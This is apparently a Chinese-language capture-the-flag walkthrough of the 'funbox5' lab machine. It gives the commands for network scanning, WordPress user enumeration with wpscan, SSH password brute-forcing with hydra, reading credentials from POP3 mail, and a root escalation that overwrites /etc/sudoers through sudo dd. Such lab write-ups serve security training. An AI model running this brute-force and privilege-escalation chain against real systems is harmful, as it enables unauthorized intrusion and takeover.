funbox5复现

信息收集

ip

arp-scan -l
netdiscover -i eth0 -r 192.168.56.0/24
nmap -sP 192.168.56.0/24
masscan 192.168.56.0/24 -p 80,22

端口

nmap -A -p- -T4 192.168.56.107

目录

使用dirsearch

访问robots.txt

访问/drupal,重定向到192.168.178.33

针对于http://192.168.56.107/drupal/ 再次扫描drupal下的目录

dirsearch -u http://192.168.56.107/drupal/ 

dirb http://192.168.56.107/drupal

网站探测

网站由WordPress，利用 wpscan 进行扫描对用户进行枚举，发现两个用户

wpscan --url http://192.168.56.107/drupal/index.php--enumerate u

根据提示--wp-content-dir制定URL

wpscan --url http://192.168.56.107/drupal/index.php --wp-content-dir=http://192.168.56.107/drupal/wp-content --enumerate u

爆破密码

hydra -L user.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.107

登录ssh 用户名/密码 ben/pookie

ben用户属于附属组 mail (GID 8)。这在管理用户权限和访问控制时非常有用。例如，属于 mail 组的用户通常会有权限访问与邮件服务相关的资源或文件。

查看mail。提示没有权限

查看后台监听端口

netstat -anp

后台监听端口发现 110端口

端口110是POP3（邮局协议版本3）的默认端口，用于电子邮件的接收和下载。

使用telnet 连接。用 ben 用户的信息凭据登录

发现有三封邮件，403 、391、578

查看578邮件，得到用户名 / 密码 adam: qwedsayxc!

登录用户adam,附属组为sudo

sudo 提权

sudo -l

adam不需要密码就能以root的身份执行命令

通过网站GTFOBins查询提权方法

https://gtfobins.github.io/

提权方法

该命令可以写入具有root权限的文件，执行命令进行写入文件/etc/sudoers，即设置adam用户具有全部的特权命令。

/etc/sudorers文件解释

该文件允许特定用户像root用户一样使用各种各样的命令，而不需要root用户的密码。

当用户执行sudo时，系统会主动寻找/etc/sudoers文件，判断该用户是否有执行sudo的权限。

LFILE=/etc/sudoers
echo "adam   ALL=(ALL:ALL) ALL " | sudo dd of=$LFILE

找到flag